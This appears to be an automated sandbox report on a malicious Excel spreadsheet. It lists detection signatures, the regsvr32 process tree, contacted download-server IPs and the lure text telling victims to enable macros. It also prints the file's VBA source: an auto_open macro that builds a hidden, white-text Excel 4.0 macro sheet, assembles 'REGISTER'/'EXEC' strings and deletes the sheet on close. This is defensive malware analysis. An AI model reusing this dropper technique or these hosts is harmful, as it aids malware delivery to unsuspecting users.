Loading ...

Play interactive tourEdit tour

Windows Analysis Report 1701667874-10042021.xls

Overview

General Information

Sample Name:1701667874-10042021.xls
Analysis ID:499734
MD5:1dc3a1c0972a9e32d88e85d1cf8f2c65
SHA1:808311a07522956f55bf842749083e199b0f04c6
SHA256:9828f899790d150360e0a3f78f3eb3b758417644bc16896aeb411e2af9e8ea4b
Tags:xlsxls
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Sigma detected: Regsvr32 Command Line Without DLL
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Potential document exploit detected (unknown TCP traffic)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2016 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 2184 cmdline: regsvr32 -silent ..\Celod.wac MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1612 cmdline: regsvr32 -silent ..\Celod.wac1 MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2528 cmdline: regsvr32 -silent ..\Celod.wac2 MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
1701667874-10042021.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -silent ..\Celod.wac, CommandLine: regsvr32 -silent ..\Celod.wac, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2016, ProcessCommandLine: regsvr32 -silent ..\Celod.wac, ProcessId: 2184
    Sigma detected: Regsvr32 Command Line Without DLLShow sources
    Source: Process startedAuthor: Florian Roth: Data: Command: regsvr32 -silent ..\Celod.wac, CommandLine: regsvr32 -silent ..\Celod.wac, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2016, ProcessCommandLine: regsvr32 -silent ..\Celod.wac, ProcessId: 2184

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

    Software Vulnerabilities:

    barindex
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 190.14.37.165:80
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 190.14.37.165:80
    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 5.196.247.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.119.113.3:80
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.165
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.165
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.165
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.165
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.165
    Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.165
    Source: unknownTCP traffic detected without corresponding DNS query: 5.196.247.11
    Source: unknownTCP traffic detected without corresponding DNS query: 5.196.247.11
    Source: unknownTCP traffic detected without corresponding DNS query: 5.196.247.11
    Source: unknownTCP traffic detected without corresponding DNS query: 5.196.247.11
    Source: unknownTCP traffic detected without corresponding DNS query: 5.196.247.11
    Source: unknownTCP traffic detected without corresponding DNS query: 5.196.247.11
    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.113.3
    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.113.3
    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.113.3
    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.113.3
    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.113.3
    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.113.3
    Source: 1701667874-10042021.xlsString found in binary or memory: http://188.119.113.3/
    Source: 1701667874-10042021.xlsString found in binary or memory: http://190.14.37.165/
    Source: 1701667874-10042021.xlsString found in binary or memory: http://5.196.247.11/
    Source: regsvr32.exe, 00000005.00000002.679858071.0000000001D50000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.680607370.0000000001C80000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.681304870.0000000001CE0000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Document image extraction number: 0Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 PROTECTEDWARNING This file o
    Source: Document image extraction number: 0Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
    Source: Document image extraction number: 0Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
    Source: Document image extraction number: 1Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 pRoTEcTmwARNNG Thisfileorigi
    Source: Document image extraction number: 1Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
    Source: Document image extraction number: 1Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
    Source: 1701667874-10042021.xlsOLE, VBA macro line: Sub auto_close()
    Source: 1701667874-10042021.xlsOLE, VBA macro line: Sub auto_open()
    Source: 1701667874-10042021.xlsOLE, VBA macro line: Private Sub saWorkbook_Opensa()
    Source: 1701667874-10042021.xlsOLE indicator, VBA macros: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDAD3.tmpJump to behavior
    Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: 1701667874-10042021.xlsOLE indicator, Workbook stream: true
    Source: classification engineClassification label: mal68.expl.winXLS@7/2@0/3
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac2
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wacJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac1Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac2Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEWindow found: window name: SysTabControl32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: 1701667874-10042021.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting2Path InterceptionProcess Injection1Disable or Modify Tools1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution21Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Scripting2Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://190.14.37.165/4%VirustotalBrowse
    http://190.14.37.165/0%Avira URL Cloudsafe
    http://188.119.113.3/4%VirustotalBrowse
    http://188.119.113.3/0%Avira URL Cloudsafe
    http://5.196.247.11/4%VirustotalBrowse
    http://5.196.247.11/0%Avira URL Cloudsafe
    http://servername/isapibackend.dll0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://190.14.37.165/1701667874-10042021.xlsfalse
    • 4%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://188.119.113.3/1701667874-10042021.xlsfalse
    • 4%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://5.196.247.11/1701667874-10042021.xlsfalse
    • 4%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://servername/isapibackend.dllregsvr32.exe, 00000005.00000002.679858071.0000000001D50000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.680607370.0000000001C80000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.681304870.0000000001CE0000.00000002.00020000.sdmpfalse
    • Avira URL Cloud: safe
    low

    Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public

    IPDomainCountryFlagASNASN NameMalicious
    5.196.247.11
    unknownFrance
    16276OVHFRfalse
    190.14.37.165
    unknownPanama
    52469OffshoreRacksSAPAfalse
    188.119.113.3
    unknownRussian Federation
    50673SERVERIUS-ASNLfalse

    General Information

    Joe Sandbox Version:33.0.0 White Diamond
    Analysis ID:499734
    Start date:08.10.2021
    Start time:22:30:15
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 6m 47s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:1701667874-10042021.xls
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:9
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal68.expl.winXLS@7/2@0/3
    EGA Information:Failed
    HDC Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Found application associated with file extension: .xls
    • Changed system and user locale, location and keyboard layout to English - United States
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer
    Warnings:
    Show All
    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, svchost.exe
    • Report size getting too big, too many NtSetInformationFile calls found.

    Simulations

    Behavior and APIs

    No simulations

    Joe Sandbox View / Context

    IPs

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    5.196.247.11173536952-10042021.xlsGet hashmaliciousBrowse
    • 5.196.247.11/44473.7079048611.dat
    190.14.37.165173536952-10042021.xlsGet hashmaliciousBrowse
    • 190.14.37.165/44473.7079048611.dat
    188.119.113.3173536952-10042021.xlsGet hashmaliciousBrowse
    • 188.119.113.3/44473.7079048611.dat

    Domains

    No context

    ASN

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    SERVERIUS-ASNLGlPWvtggPp.exeGet hashmaliciousBrowse
    • 193.38.55.46
    z8dCygeB6f.exeGet hashmaliciousBrowse
    • 188.119.113.208
    173536952-10042021.xlsGet hashmaliciousBrowse
    • 188.119.113.3
    hFRBBl9qJLGet hashmaliciousBrowse
    • 46.249.32.215
    qVoV2KOkEUGet hashmaliciousBrowse
    • 46.249.32.215
    gkfL4Bz8D0Get hashmaliciousBrowse
    • 46.249.32.215
    Fy6PrO6OOeGet hashmaliciousBrowse
    • 46.249.32.215
    Trainer v9.2.4.exeGet hashmaliciousBrowse
    • 45.67.228.152
    03tjfO4HU9.exeGet hashmaliciousBrowse
    • 45.67.231.218
    34e76d8a68c1eefd5681eb51a19019d189323f646c789.exeGet hashmaliciousBrowse
    • 188.119.113.86
    JNk46WKTxo.exeGet hashmaliciousBrowse
    • 45.67.228.118
    Document_1752244602-Copy.xlsGet hashmaliciousBrowse
    • 193.38.54.149
    Document_1752244602-Copy.xlsGet hashmaliciousBrowse
    • 193.38.54.149
    Document_1752244602-Copy.xlsGet hashmaliciousBrowse
    • 193.38.54.149
    qbot5.xlsxGet hashmaliciousBrowse
    • 193.38.54.149
    qbot5.xlsxGet hashmaliciousBrowse
    • 193.38.54.149
    qbot5.xlsxGet hashmaliciousBrowse
    • 193.38.54.149
    Document_85143683-Copy.xlsGet hashmaliciousBrowse
    • 193.38.54.149
    Document_5153204-Copy.xlsGet hashmaliciousBrowse
    • 193.38.54.149
    Document_143276485-Copy.xlsGet hashmaliciousBrowse
    • 193.38.54.149
    OVHFRFOL_JDHD98373_AMAZON_COMPROBANTE_FISCAL_DIGITAL_0398309_JDHSGGS.htmlGet hashmaliciousBrowse
    • 144.217.139.163
    BROCATELLE.exeGet hashmaliciousBrowse
    • 178.32.63.50
    yutrre123.exeGet hashmaliciousBrowse
    • 213.186.33.5
    dec.exeGet hashmaliciousBrowse
    • 213.186.33.5
    5DRyQNWb8e.exeGet hashmaliciousBrowse
    • 51.195.57.236
    Contract-No-AJ-1343CL-REFERENCE-837373HHYAAHYSBDDS3736362_OCTOBER-2021.vbsGet hashmaliciousBrowse
    • 178.32.63.50
    P. OFERTA 211008 Balearia Eurolineas Maritimas, S.A.exeGet hashmaliciousBrowse
    • 94.23.221.28
    SCAN_COP.EXEGet hashmaliciousBrowse
    • 51.210.156.152
    CONFIRM_.EXEGet hashmaliciousBrowse
    • 51.210.156.152
    MV ROCKET_PDA.exeGet hashmaliciousBrowse
    • 37.187.131.150
    6pDnJNQuXpGet hashmaliciousBrowse
    • 51.161.7.116
    fh6FJ4ntlEGet hashmaliciousBrowse
    • 51.161.7.116
    w7l28fLnhLGet hashmaliciousBrowse
    • 51.161.7.116
    Vw1TY7nUmjGet hashmaliciousBrowse
    • 51.161.7.116
    HqFa1ntiY8Get hashmaliciousBrowse
    • 51.161.7.116
    0WefzeoV6XGet hashmaliciousBrowse
    • 51.161.7.116
    YrNB27LHmuGet hashmaliciousBrowse
    • 51.161.7.116
    bZEi1V3BCtGet hashmaliciousBrowse
    • 51.161.7.116
    k0pLFMJMbp.dllGet hashmaliciousBrowse
    • 54.39.106.25
    MT103-384849392983.docGet hashmaliciousBrowse
    • 158.69.91.158
    OffshoreRacksSAPAAMLRPT_257035367.xlsGet hashmaliciousBrowse
    • 190.14.37.238
    AMLRPT_1428592311.xlsGet hashmaliciousBrowse
    • 190.14.37.238
    AMLRPT_819011139.xlsGet hashmaliciousBrowse
    • 190.14.37.238
    AMLRPT_1428592311.xlsGet hashmaliciousBrowse
    • 190.14.37.238
    AMLRPT_819011139.xlsGet hashmaliciousBrowse
    • 190.14.37.238
    Document_1680405650-10062021.xlsGet hashmaliciousBrowse
    • 190.14.37.107
    Document_1680405650-10062021.xlsGet hashmaliciousBrowse
    • 190.14.37.107
    Document_748968552-10062021.xlsGet hashmaliciousBrowse
    • 190.14.37.107
    173536952-10042021.xlsGet hashmaliciousBrowse
    • 190.14.37.165
    UdQiakT3q5.xlsGet hashmaliciousBrowse
    • 190.14.37.187
    UdQiakT3q5.xlsGet hashmaliciousBrowse
    • 190.14.37.187
    Compensation-54975366-09272021.xlsGet hashmaliciousBrowse
    • 190.14.37.178
    Compensation-54975366-09272021.xlsGet hashmaliciousBrowse
    • 190.14.37.178
    CompensationClaim-1630636598-09282021.xlsGet hashmaliciousBrowse
    • 190.14.37.187
    CompensationClaim-1033191014-09282021.xlsGet hashmaliciousBrowse
    • 190.14.37.187
    xls.xlsGet hashmaliciousBrowse
    • 190.14.37.178
    Compensation-1214892625-09272021.xlsGet hashmaliciousBrowse
    • 190.14.37.178
    Compensation-2100058996-09272021.xlsGet hashmaliciousBrowse
    • 190.14.37.178
    Compensation-1657705079-09272021.xlsGet hashmaliciousBrowse
    • 190.14.37.178
    Compensation-1214892625-09272021.xlsGet hashmaliciousBrowse
    • 190.14.37.178

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):162688
    Entropy (8bit):4.254323210253177
    Encrypted:false
    SSDEEP:1536:C6aL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CbJNSc83tKBAvQVCgOtmXmLpLm4l
    MD5:CB869BE78123435D1424E8D46E109C0B
    SHA1:5F7F80EB1C733006623828551737BBB312563659
    SHA-256:3CBA343B556B4D7DD4331CB01FC4DD64992C53998D0A0FE392A9B53DEE015297
    SHA-512:3E8DD0FB16306A8507352DCC97744C5C5E3A2A7C9C894888F84CC715C9CE5045787E04F5398BA84C7096B64BB795267DF11FF60FC433398C6D687A27D7165C39
    Malicious:false
    Reputation:low
    Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................
    C:\Users\user\AppData\Local\Temp\VBE\RefEdit.exd
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):15676
    Entropy (8bit):4.532584445930937
    Encrypted:false
    SSDEEP:192:RllA11DxzCOtHIT6P20eChgZjTdZ3HJV8L1I17EMBkDXrq9LwGGLVbkLde:RL8xesT20lheZ3waE5D7qxIxkxe
    MD5:76E42ECC749A94DE9640F3AB385B214E
    SHA1:ED8C80ACAA1AA06590770D3854B2BDF248AD6F15
    SHA-256:469812A4111C69521D0F8CF6103F9087F5EBE4D8976948C8E330622944A30D4E
    SHA-512:DB1BD45F231CAFFCC9FE75F5F955907CE0240C3777575DD48856E90D2D2024558690A1818BB33AE2FE4F1798535D73937547A68E6ECD05DF6B17C29D14CC822C
    Malicious:false
    Reputation:low
    Preview: MSFT................A...............................1............... ...................d...........,...................\...........H...4...........0... ...............................................................x...............................x.......................................................................................$"...............................................P..................................................$"..........................................0....P..,.........................0.....................%"..........................................H..."...................................................H.......(...................@...................P...............0.......`...............................p...X... .................W.!]iI..[S.0.t.........E.............F...........B........`..d......."E.............F........0..............F..........E........`.M...........CPf.........0..=.......01..)....w....<WI.......\.1Y........k...U........".......|...K..a...

    Static File Info

    General

    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Test, Last Saved By: Test, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Mon Oct 4 09:34:12 2021, Security: 0
    Entropy (8bit):7.07736722605419
    TrID:
    • Microsoft Excel sheet (30009/1) 47.99%
    • Microsoft Excel sheet (alternate) (24509/1) 39.20%
    • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
    File name:1701667874-10042021.xls
    File size:132608
    MD5:1dc3a1c0972a9e32d88e85d1cf8f2c65
    SHA1:808311a07522956f55bf842749083e199b0f04c6
    SHA256:9828f899790d150360e0a3f78f3eb3b758417644bc16896aeb411e2af9e8ea4b
    SHA512:9bd8112044f2ca4f11861a50773c4cd98ce69bb04f523c4168c35481431eb2347a4ecb0e5c806217fdb89a977283168236046ebbdc0d7e556456b6ed5ba575db
    SSDEEP:3072:Sk3hOdsylKlgxopeiBNhZFGzE+cL2kdAxc6YehWfGdtUHKGDbpmsii/+u6ssC06+:Sk3hOdsylKlgxopeiBNhZF+E+W2kdAxX
    File Content Preview:........................>.......................................................b..............................................................................................................................................................................

    File Icon

    Icon Hash:e4eea286a4b4bcb4

    Static OLE Info

    General

    Document Type:OLE
    Number of OLE Files:1

    OLE File "1701667874-10042021.xls"

    Indicators

    Has Summary Info:True
    Application Name:Microsoft Excel
    Encrypted Document:False
    Contains Word Document Stream:False
    Contains Workbook/Book Stream:True
    Contains PowerPoint Document Stream:False
    Contains Visio Document Stream:False
    Contains ObjectPool Stream:
    Flash Objects Count:
    Contains VBA Macros:True

    Summary

    Code Page:1251
    Author:Test
    Last Saved By:Test
    Create Time:2015-06-05 18:17:20
    Last Saved Time:2021-10-04 08:34:12
    Creating Application:Microsoft Excel
    Security:0

    Document Summary

    Document Code Page:1251
    Thumbnail Scaling Desired:False
    Company:
    Contains Dirty Links:False
    Shared Document:False
    Changed Hyperlinks:False
    Application Version:1048576

    Streams with VBA

    VBA File Name: UserForm2, Stream Size: -1
    General
    Stream Path:_VBA_PROJECT_CUR/UserForm2
    VBA File Name:UserForm2
    Stream Size:-1
    Data ASCII:
    Data Raw:
    VBA Code
    Attribute VB_Name = "UserForm2"
    Attribute VB_Base = "0{86A322E3-3EAA-43BD-A15C-2E5BDAB20ADE}{6DC45358-AAC1-427A-8A44-4B339D5A54C8}"
    Attribute VB_GlobalNameSpace = False
    Attribute VB_Creatable = False
    Attribute VB_PredeclaredId = True
    Attribute VB_Exposed = False
    Attribute VB_TemplateDerived = False
    Attribute VB_Customizable = False
    VBA File Name: Module1, Stream Size: 1533
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/Module1
    VBA File Name:Module1
    Stream Size:1533
    Data ASCII:. . . . . . . . . B . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 03 f0 00 00 00 42 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 70 03 00 00 08 05 00 00 00 00 00 00 01 00 00 00 fb 18 3d fb 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    VBA Code
    Attribute VB_Name = "Module1"
    
    Function jgfjgjfhfhf()
    Set Fera = Excel4IntlMacroSheets
    Fera.Add.Name = "Sheettt"
    End Function
    Sub auto_close()
    
    
    Application.ScreenUpdating = True
       Application.DisplayAlerts = False
       Sheets("Sheettt").Delete
       Application.DisplayAlerts = True
    
    End Sub
    VBA File Name: Module5, Stream Size: 3595
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/Module5
    VBA File Name:Module5
    Stream Size:3595
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ] . . . . . . . . . . . . . . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 01 f0 00 00 00 82 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 89 02 00 00 5d 0b 00 00 00 00 00 00 01 00 00 00 fb 18 e3 25 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    VBA Code
    Attribute VB_Name = "Module5"
    
    Sub auto_open()
    On Error Resume Next
    Trewasd = "R" & "E" & "G" & "I" & "STER"
    Drezden = "="
    Naret = "E" & "X" & "E" & "C"
    DUJSKFASD = UserForm2.Label5.Caption
    Application.ScreenUpdating = False
    jgfjgjfhfhf
    Sheets("Sheettt").Visible = False
    Sheets("Sheettt").Range("A1:M100").Font.Color = vbWhite
    
    Sheets("Sheettt").Range("H24") = UserForm2.Label1.Caption
    Sheets("Sheettt").Range("H25") = UserForm2.Label3.Caption
    Sheets("Sheettt").Range("H26") = UserForm2.Label4.Caption
    
